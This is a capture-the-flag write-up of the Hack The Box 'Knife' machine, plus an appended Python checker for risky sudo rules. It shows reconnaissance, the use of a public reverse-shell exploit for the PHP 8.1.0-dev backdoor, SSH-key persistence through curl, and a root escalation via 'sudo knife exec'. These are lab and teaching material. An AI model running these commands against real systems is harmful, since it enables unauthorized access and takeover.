HTB: Knife


I run nmap and find ports 22 and 80 open.

└──╼ ports=$(nmap -p- -T4 -Pn -n | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)
└──╼ echo $ports 
└──╼ nmap -sC -sV -Pn -p$ports
Starting Nmap 7.92 ( ) at 2022-05-07 14:36 BST
Nmap scan report for
Host is up (0.049s latency).

22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 be:54:9c:a3:67:c3:15:c3:64:71:7f:6a:53:4a:4c:21 (RSA)
|   256 bf:8a:3f:d4:06:e9:2e:87:4e:c9:7e:ab:22:0e:c0:ee (ECDSA)
|_  256 1a:de:a1:cc:37:ce:53:bb:1b:fb:2b:0b:ad:b3:f6:84 (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-title:  Emergent Medical Idea
|_http-server-header: Apache/2.4.41 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Because port 80 is open, I check whether a website is hosted on the machine. There is one, but it is just an empty static page with nothing interesting.

A directory scan with gobuster reveals one directory, “server-status”, but still nothing interesting.

I use nikto to scan the web server and find something interesting: the “X-Powered-By” header reports PHP/8.1.0-dev, a development version that was released with a backdoor…

└──╼ nikto -h
- Nikto v2.1.5
+ Target IP:
+ Target Hostname:
+ Target Port:        80
+ Start Time:         2022-05-07 14:44:33 (GMT1)
+ Server: Apache/2.4.41 (Ubuntu)
+ Retrieved x-powered-by header: PHP/8.1.0-dev
+ The anti-clickjacking X-Frame-Options header is not present.
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ DEBUG HTTP verb may show server debugging information. See for details.
+ 6544 items checked: 0 error(s) and 3 item(s) reported on remote host
+ End Time:           2022-05-07 14:49:59 (GMT1) (326 seconds)
+ 1 host(s) tested

User flag

With a quick search I find two exploits on GitHub, exploit-1 and exploit-2. I download the first one because it directly opens a reverse shell on the target and seems simpler to use, perfect for my objective.

I clone the repository and run the script. It works perfectly; I take the flag and continue with the privilege escalation.

└──╼ ./
Checking if host is vulnerable...

Vulnerable --> PHP/8.1.0
[+] Spawning shell

$ whoami
$ ls -l /home/james
total 4
-r-------- 1 james james 33 May  7 11:56 user.txt

Root flag

First I upgrade the shell, purely for convenience. To accomplish this I generate an ssh key and add it to the “authorized_keys” file of the james user.

# create the ssh key and host a web server
└──╼ ssh-keygen
Generating public/private rsa key pair.
Enter file in which to save the key (/home/user/.ssh/id_rsa): ./id_rsa
└──╼ python3 -m http.server 8080
Serving HTTP on port 8080 ( ...

# on the target download and add the key to the "authorized_keys" file
$ curl > /home/james/.ssh/authorized_keys

# connect to the target using ssh
└──╼ ssh -i id_rsa james@
james@knife:~$ whoami

I upload to the machine for a quick enumeration and quickly find several vulnerabilities:

  1. Sudo version is vulnerable to priv esc.
  2. Vulnerable to CVE-2021-4034 (priv esc).
  3. We can run the command “/usr/bin/knife” with sudo.

╔══════════╣ Sudo version
Sudo version 1.8.31

╔══════════╣ CVEs Check
Vulnerable to CVE-2021-4034

╔══════════╣ Checking 'sudo -l', /etc/sudoers, and /etc/sudoers.d
Matching Defaults entries for james on knife:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User james may run the following commands on knife:
    (root) NOPASSWD: /usr/bin/knife

The first two are very easy to exploit (just download the exploit and run it), so I explore the third one instead.

I search on Google and find that the program knife actually exists.

I search for it on GTFOBins and discover an easy way to escalate privileges, taking advantage of the fact that we can execute it with sudo.

james@knife:~$ sudo knife exec -E 'exec "/bin/sh"'
# whoami
# ls -l /root/root.txt
-r-------- 1 root root 33 May  7 11:56 /root/root.txt

And that’s it! I’m root.
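A defender-side check for the third finding, added here as an example (it is not part of the writeup or of any tool used in it): it parses `sudo -l` output in the format shown above and flags NOPASSWD rules that hand root a binary able to run arbitrary commands. The sample output and the watchlist of shell-capable binaries are constructed assumptions.

```python
import re
from typing import Dict, List

# Constructed sample in the shape of the `sudo -l` output seen on the target.
SAMPLE_SUDO_L = """
Matching Defaults entries for james on knife:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin\\:/snap/bin

User james may run the following commands on knife:
    (root) NOPASSWD: /usr/bin/knife
    (root) NOPASSWD: /usr/bin/apt-get update
    (ALL) /usr/bin/less
"""

# Assumed watchlist: binaries whose documented features can execute an
# arbitrary command (knife exec, less's shell escape, interpreters, ...).
SHELL_CAPABLE = {"knife", "less", "vim", "vi", "python3", "perl", "find", "awk", "bash", "sh"}

# (runas) [TAG: ...] command
RULE_RE = re.compile(r"^\s*\(([^)]+)\)\s*((?:[A-Z_]+:\s*)*)(.+)$")


def parse_sudo_l(text: str) -> List[Dict[str, object]]:
    """Return one dict per rule line: runas user, tag set, command string."""
    rules: List[Dict[str, object]] = []
    in_rules = False
    for line in text.splitlines():
        if line.startswith("User ") and "may run" in line:
            in_rules = True          # rules follow this header line
            continue
        if not in_rules or not line.strip():
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        runas, tags, cmd = m.group(1), m.group(2), m.group(3).strip()
        runas_user = runas.split(":")[0].strip()   # "(root : root)" -> "root"
        tag_set = {t.strip() for t in tags.split(":") if t.strip()}
        rules.append({"runas": runas_user, "tags": tag_set, "command": cmd})
    return rules


def risky_rules(text: str) -> List[str]:
    """Flag rules that run a shell-capable binary as root without a password."""
    findings = []
    for r in parse_sudo_l(text):
        binary = str(r["command"]).split()[0].rsplit("/", 1)[-1]
        if r["runas"] in ("root", "ALL") and "NOPASSWD" in r["tags"] and binary in SHELL_CAPABLE:
            findings.append(f"{r['command']} as {r['runas']} without password")
    return findings
```

Run against the real output of `sudo -l` on a host you administer; a hit means the rule needs a tighter command or removal.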
